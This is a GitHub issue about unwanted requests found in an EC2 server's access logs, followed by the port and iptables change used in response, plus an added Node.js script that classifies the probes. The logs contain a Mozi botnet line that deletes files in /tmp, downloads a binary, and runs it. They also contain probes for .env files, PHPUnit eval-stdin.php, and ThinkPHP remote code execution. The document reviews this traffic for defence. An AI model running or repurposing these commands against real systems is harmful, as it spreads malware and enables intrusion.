[🔧 Back-End Error] #3 / Block unintended requests on EC2 / 2021-09-30 #277

Open
mniYUNSU opened this issue Sep 30, 2021 · 0 comments
Assignees
Labels
Back-End Back-End Tasks Error Error

mniYUNSU commented Sep 30, 2021

What is the error?

  • Confirmed that unintended requests were logged in the EC2 server logs in the deployed environment

Error message

GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.206 ms - 10
GET /.env 404 0.211 ms 
POST /Autodiscover/Autodiscover.xml 404 0.214 ms - 10
GET /wp-content/plugins/wp-file-manager/readme.txt 404 0.228 ms - 10
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 0.205 ms - 10
POST /api/jsonws/invoke 404 0.168 ms - 10
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 404 0.199 ms - 10
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 0.210 ms - 10

GET /?XDEBUG_SESSION_START=phpstorm 200 0.221 ms - 12

POST /mifs/.;/services/LogService 404 0.217 ms - 10
GET /console/ 404 0.225 ms - 10
GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.206 ms - 10
GET /.env 404 0.211 ms - 10

How the error was handled

  • Changed the server port, which had been set to 80 through an environment variable. Added a new port to the EC2 inbound rules, and changed the server's environment variable to the newly added port number.
  • Because CloudFront only converts port 80 responses to HTTPS, an additional step was needed to forward the newly added port to port 80.
sudo iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 80 -j REDIRECT --to-port <port I added>

Reference links consulted for handling the error

Agora States
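
The log in this issue follows a `METHOD URL STATUS TIME ms - LENGTH` layout. As an added example (not part of the original issue or the project's code), the Node.js script below groups such lines by probe type and lists any probe that received something other than a 404. The signature labels and the names `parseLine` and `triage` are assumptions made for illustration.

```javascript
// Added example: triage for access-log lines in the format shown in this issue.
// Signature labels are an assumed reading of the request paths, not from the issue.
const SIGNATURES = [
  [/^\/shell\?.*wget/i, "shell command injection (payload download)"],
  [/^\/\.env$/, "dotenv file disclosure"],
  [/eval-stdin\.php$/, "PHPUnit eval-stdin.php"],
  [/^\/wp-content\//, "WordPress plugin fingerprint"],
  [/invokefunction/i, "ThinkPHP invokefunction"],
  [/XDEBUG_SESSION_START/, "Xdebug session trigger"],
  [/^\/Autodiscover\//i, "Exchange Autodiscover"],
  [/^\/api\/jsonws\/invoke$/, "JSON web-service invoke endpoint"],
  [/^\/mifs\//, "/mifs/ service path"],
  [/^\/console\/?$/, "admin console"],
];

// METHOD URL STATUS TIME ms [- LENGTH]; the length field may be missing.
const LINE = /^(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) (\d{3}) [\d.]+ ms(?: - \d+)?\s*$/;

function parseLine(line) {
  const m = LINE.exec(line);
  if (!m) return null;
  return { method: m[1], url: m[2], status: Number(m[3]) };
}

function triage(lines) {
  const report = { probes: {}, answered: [], unparsed: 0 };
  for (const line of lines) {
    if (!line.trim()) continue;
    const req = parseLine(line);
    if (!req) { report.unparsed++; continue; }
    const hit = SIGNATURES.find(([re]) => re.test(req.url));
    if (!hit) continue;
    report.probes[hit[1]] = (report.probes[hit[1]] || 0) + 1;
    // A probe that did not get 404 was answered by a real route: review the response.
    if (req.status !== 404) report.answered.push(req);
  }
  return report;
}

// Sample lines copied from the log in the issue above.
const SAMPLE = [
  "GET /.env 404 0.211 ms ",
  "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 0.205 ms - 10",
  "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 0.210 ms - 10",
  "GET /?XDEBUG_SESSION_START=phpstorm 200 0.221 ms - 12",
  "GET /console/ 404 0.225 ms - 10",
];
console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

On the sample, the only entry under `answered` is the `XDEBUG_SESSION_START` request, which the root route served with a 200 while every other probe got a 404.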

@mniYUNSU mniYUNSU added Completed Task or Issue Completed Back-End Back-End Tasks Error Error labels Sep 30, 2021
@mniYUNSU mniYUNSU self-assigned this Sep 30, 2021
@minjman2659 minjman2659 self-assigned this Oct 1, 2021
@minjman2659 minjman2659 changed the title [🔧 Back-End Error] #2 / Block unintended requests on EC2 / 2021-09-30 [🔧 Back-End Error] #3 / Block unintended requests on EC2 / 2021-09-30 Oct 1, 2021
@minjman2659 minjman2659 removed the Completed Task or Issue Completed label Oct 1, 2021